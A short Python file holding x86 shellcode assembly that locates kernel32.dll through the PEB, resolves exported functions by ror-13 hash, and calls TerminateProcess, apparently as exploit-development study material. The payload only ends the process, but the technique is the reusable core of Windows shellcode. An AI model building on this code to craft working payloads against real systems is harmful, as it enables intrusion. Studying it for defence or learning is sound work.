Find Kernel32.dll Load Address & Function

code.py

CODE = (
" start: "
"  int3 ;"
"  mov ebp, esp ;" 
"  add esp, 0xfffffdfc ;" 
"  call find_kernel32 ;"
"  push 0x78b5b983 ;" # Hash of TerminateProcess 
"  call find_function ;" 
"  xor ecx, ecx ;" 
"  push ecx ;" # uExitCode
"  push 0xffffffff ;" # hProcess
"  call eax ;" # Call

" find_kernel32: " 
"  xor ecx, ecx ;" 
"  mov esi,fs:[ecx+30h] ;"
"  mov esi,[esi+0Ch] ;" 
"  mov esi,[esi+1Ch] ;"
"  next_module: "
"  mov ebx, [esi+8h] ;"
"  mov edi, [esi+20h] ;"
"  mov esi, [esi] ;" 
"  cmp [edi+12*2], cx ;" 
"  jne next_module ;" 

" find_function: "
"  pushad ;" 
"  mov eax, [ebx+0x3c] ;"
"  mov edi, [ebx+eax+0x78] ;"
"  add edi, ebx ;"
"  mov ecx, [edi+0x18] ;"
"  mov eax, [edi+0x20] ;"
"  add eax, ebx ;"
"  mov [ebp-4], eax ;" 

" find_function_loop: " 
"  jecxz find_function_finished ;" 
"  dec ecx ;"
"  mov eax, [ebp-4] ;"
"  mov esi, [eax+ecx*4] ;"
"  add esi, ebx ;"

" compute_hash: " 
"  xor eax, eax ;"
"  cdq ;"
"  cld ;"

" compute_hash_again: " 
"  lodsb ;"
"  test al, al ;"
"  jz compute_hash_finished ;" 
"  ror edx, 0x0d ;"
"  add edx, eax ;" 
"  jmp compute_hash_again ;" 

" compute_hash_finished: " 
"  find_function_compare: "
"  cmp edx, [esp+0x24] ;"
"  jnz find_function_loop ;"
"  mov edx, [edi+0x24] ;"
"  add edx, ebx ;"
"  mov cx, [edx+2*ecx] ;"
"  mov edx, [edi+0x1c] ;"
"  add edx, ebx ;"
"  mov eax, [edx+4*ecx] ;"
"  add eax, ebx ;"
"  mov [esp+0x1c], eax ;"

" find_function_finished: "
"  popad ;"
"  ret " 
)